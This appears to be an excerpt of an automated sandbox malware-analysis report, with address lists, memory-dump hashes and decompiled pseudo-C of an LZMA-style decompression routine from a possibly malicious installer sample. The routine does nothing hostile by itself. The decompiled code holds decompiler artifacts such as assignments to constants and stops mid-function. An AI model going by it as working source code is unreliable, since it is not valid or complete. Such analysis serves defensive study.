                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x004068bc
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068c2
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000
                                                  0x00406a6f
                                                  0x004068bc
                                                  0x00406843
                                                  0x00406840
                                                  0x00000000
                                                  0x00406595

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                  • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                  • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                  • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004064DD, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004064DD() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
